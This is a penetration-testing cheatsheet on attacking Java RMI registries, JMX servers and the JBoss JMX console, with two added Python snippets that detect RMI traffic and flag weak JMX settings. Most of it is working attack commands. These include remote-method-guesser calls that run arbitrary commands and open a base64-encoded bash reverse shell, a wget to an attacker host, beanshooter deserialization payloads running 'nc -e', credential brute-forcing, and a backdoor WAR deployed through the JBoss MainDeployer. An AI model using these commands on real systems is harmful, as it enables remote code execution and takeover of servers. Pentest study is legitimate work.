Java JMX RMI Pentest Cheatsheet


RMI can run on any nonstandard port, and when RMI is running you will observe one more endpoint port connected to it (nmap's rmi-dumpregistry script finds it easily).

# The jmxrmi bound name and its method signatures might be vulnerable to the MLet MBean issue: MLet is an MBean that can be used to load additional MBeans over the network.
# Signatures exposed by the jmxrmi bound name (the RMIServer interface):
java.lang.String getVersion()
newClient(java.lang.Object arg)
Java RMI Registry - Port 1616

nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616 <host>
What is Java RMI?
The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

When developers want to make their Java objects available within the network, they usually bind them to an RMI registry. The registry stores all information required to connect to the object (IP address, listening port, implemented class or interface and the ObjID value) and makes it available under a human readable name (the bound name). Clients that want to consume the RMI service ask the RMI registry for the corresponding bound name and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary DNS service.
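Because a registry can sit on any port (see above), it helps to recognise the RMI wire protocol itself rather than rely on port numbers. The following is an added example, not part of the original cheatsheet: it recognises the JRMP client header and parses the server's ProtocolAck from captured bytes, using constructed sample data.

```python
"""Recognise Java RMI (JRMP) traffic on any port from captured bytes.

Added example, not part of the original cheatsheet. Byte layouts follow the
JRMP wire protocol: the client opens with the magic "JRMI", a 2-byte version
(2) and a protocol byte; the server answers with ProtocolAck (0x4e) followed
by the client's endpoint as a UTF string (2-byte length + bytes) and a 4-byte
big-endian port.
"""
import struct

JRMI_MAGIC = b"JRMI"
JRMP_VERSION = 2
PROTOCOLS = (0x4B, 0x4C, 0x4D)   # StreamProtocol, SingleOpProtocol, MultiplexProtocol
PROTOCOL_ACK = 0x4E
PROTOCOL_NOT_SUPPORTED = 0x4F


def is_client_hello(data: bytes) -> bool:
    """True if the first bytes of a client->server stream are a JRMP header."""
    if len(data) < 7 or data[:4] != JRMI_MAGIC:
        return False
    version, proto = struct.unpack(">HB", data[4:7])
    return version == JRMP_VERSION and proto in PROTOCOLS


def parse_protocol_ack(data: bytes):
    """Parse a server ProtocolAck; returns (host, port) or None if it is not one."""
    if len(data) < 3 or data[0] != PROTOCOL_ACK:
        return None
    (hlen,) = struct.unpack(">H", data[1:3])
    if len(data) < 3 + hlen + 4:
        return None                      # truncated capture
    host = data[3:3 + hlen].decode("utf-8")
    (port,) = struct.unpack(">i", data[3 + hlen:7 + hlen])
    return host, port


# Constructed sample exchange with a registry on a nonstandard port.
CLIENT_HELLO = b"JRMI\x00\x02\x4b"
SERVER_ACK = b"\x4e\x00\x0a10.0.0.123\x00\x00\xc3\x50"   # client seen as 10.0.0.123:50000

if __name__ == "__main__":
    print(is_client_hello(CLIENT_HELLO))     # True
    print(parse_protocol_ack(SERVER_ACK))    # ('10.0.0.123', 50000)
```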

What is Apache Tomcat?
Apache Tomcat is a free and open-source implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies. It provides a "pure Java" HTTP web server environment in which Java code can run.

What is JBoss application server?
JBoss application server is an open-source platform, developed by Red Hat, used for implementing Java applications and a wide variety of other software applications. You can build and deploy Java services to be scaled to fit the size of your business.

What is JMX?
Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean).
Using the JMX console, we can manage the application and, therefore, alter it to execute malicious code on the target server and gain remote code execution.
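The checks that beanshooter's info/enum commands perform (is authentication on, is SSL on) map directly to the JVM system properties a service was started with. The following is an added example, not part of the original cheatsheet: it reads those -D properties from a JVM command line (as shown by ps) and reports the weak settings, with a constructed weak command line beside a hardened one.

```python
"""Flag weak remote-JMX settings in a JVM command line.

Added example, not part of the original cheatsheet. Defaults applied when a
key is absent follow the JDK: authenticate=true, ssl=true.
"""
import shlex

JMX = "com.sun.management.jmxremote"


def parse_system_properties(cmdline: str) -> dict:
    """Collect -Dkey=value pairs from a JVM command line."""
    props = {}
    for tok in shlex.split(cmdline):
        if tok.startswith("-D"):
            key, _, value = tok[2:].partition("=")
            props[key] = value.strip().lower()
    return props


def assess_jmx(cmdline: str) -> list:
    """Return findings; empty means no remote connector or a hardened one."""
    props = parse_system_properties(cmdline)
    port = props.get(JMX + ".port")
    if port is None:
        return []                        # no remote JMX connector exposed
    findings = []
    if props.get(JMX + ".authenticate", "true") == "false":
        findings.append("port %s: authentication disabled; any client can invoke MBeans" % port)
    if props.get(JMX + ".ssl", "true") == "false":
        findings.append("port %s: TLS disabled; credentials and MBean calls travel in clear" % port)
    return findings


# Constructed command lines: the weak configuration beside a hardened one.
# jmxremote.rmi.port pins the second endpoint port mentioned at the top of the page.
WEAK = ("java -Dcom.sun.management.jmxremote.port=5000 "
        "-Dcom.sun.management.jmxremote.authenticate=false "
        "-Dcom.sun.management.jmxremote.ssl=false -jar app.jar")
HARDENED = ("java -Dcom.sun.management.jmxremote.port=5000 "
            "-Dcom.sun.management.jmxremote.rmi.port=5000 "
            "-Dcom.sun.management.jmxremote.authenticate=true "
            "-Dcom.sun.management.jmxremote.password.file=/etc/jmx/jmxremote.password "
            "-Dcom.sun.management.jmxremote.access.file=/etc/jmx/jmxremote.access "
            "-Dcom.sun.management.jmxremote.ssl=true -jar app.jar")

if __name__ == "__main__":
    for finding in assess_jmx(WEAK):
        print("WEAK:", finding)
    print("hardened findings:", assess_jmx(HARDENED))   # []
```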

What is an MBean?
An MBean is a managed Java object, similar to a JavaBeans component, that follows the design patterns set forth in the JMX specification. An MBean can represent a device, an application, or any resource that needs to be managed.

# Download the BaRMIe package from its releases page

java -jar BaRMIe.jar -enum 5000
java -jar BaRMIe.jar -attack 5000
Remote Method Guesser  
java -jar rmg-3.0.0-jar-with-dependencies.jar 5000 enum

# Look for vulnerabilities
java -jar rmg.jar enum 5000

# Get bound names (brute force) and available method signatures
java -jar rmg.jar guess 1099
CustomRMIServer ] HIT! Method with signature String runCommand(Strin

# Exploiting the available method
java -jar rmg.jar call 1099 --bound-name CustomRMIServer 'new String[] {"ls", "-al"}' --signature 'String runCommand(String[] args)'

# By default, Remote Method Guesser does not display the function/command output; we need to use remote plugins to get the output.
# Bound name = CustomRMIServer, followed by the signature found by guess.
# Use the time command with sleep to find out whether we are able to execute commands.
time java -jar rmg.jar call 1099 --bound-name CustomRMIServer 'new String[] {"sleep", "5"}' --signature 'String runCommand(String[] args)'

# If the sleep is successful, it is time for command execution using the RMG plugin GenericPrint.jar
java -jar rmg.jar call 1099 --bound-name CustomRMIServer 'new String[] {"ls", "-al"}' --signature 'String runCommand(String[] args)' --plugin plugins/GenericPrint.jar

# Gaining a reverse shell
echo '/bin/bash -c "bash -i >& /dev/tcp/ 0>&1"' | base64 -w0;echo
java -jar rmg.jar call 1099 'new String[] {"/bin/bash", "-c", "echo L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjEvNDQzIDA+JjEiCg==| base64 -d | bash"}' --signature 'String runCommand(String[] args)' --bound-name CustomRMIServer --plugin plugins/GenericPrint.jar

# Command exec - example
java -jar rmg.jar call 5000 "wget Attacker_IP:8000/worked" --signature 'String execute(String cmd)' --bound-name jmxrmi

# Exploit CVE-2019-2684; try to bind a client locally; doesn't work for JMX RMI
java -jar rmg.jar bind 5000 my-object --localhost-bypass
# Good for JMX servers
Source - 

# Download the package from the repo

# Check for auth and possible attributes
# If auth is enabled, you cannot go further.
java -jar beanshooter.jar info 5000

# Enum - check for vulns (auth and pre-auth deserialization)
java -jar beanshooter.jar enum 5000

# Brute-force creds
java -jar beanshooter.jar brute 5000 --username-file /usr/share/wordlists/user.txt --password-file /usr/share/wordlists/pass.txt

# You might require ysoserial.jar; download it and copy it to /opt/yso.jar, or pass the arg "--yso /opt/yso.jar"
java -jar beanshooter.jar serial 5000 CommonsCollections6 "nc 443 -e ash" --username admin --password admin

# Add --preauth if pre-auth deserialization is enabled
java -jar beanshooter.jar serial 5000 --preauth CommonsCollections6 "nc 443 -e ash"

# If SSL is enabled
java -jar beanshooter.jar enum --ssl 5000

# If the remote MBean server does not require auth
# This might require tonka; you can find it in the beanshooter repo

# Download the package

git clone 

java -jar rmiscout.jar bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port>

java -jar rmiscout.jar wordlist -i lists/prototypes.txt <host> <port>
Attacking JBOSS JMX Management  
The default username/password is admin:admin

- Under the 'JMX Agent View' page, you can search for any JBoss API.
- Search for 'jboss.system*' to find the MainDeployer (JBoss System API).
- The MainDeployer service can be used to manage deployments on the JBoss application server.
- Scroll down to the redeploy attribute and make sure it accepts a URL as input.
- Use the backdoor JSP payload from - 
- Create a WAR file using `jar -cvf cmd.war cmd.jsp`
- Host it on a Python HTTP server and make sure it is reachable from the JBoss server; a WAR file can be invoked from a URL and installed.
- Under MainDeployer on the JMX Console page, paste the cmd.war URL into the redeploy attribute and hit "Deploy".
- Now head over to '' for GET command execution.

Bhanu Namikaze
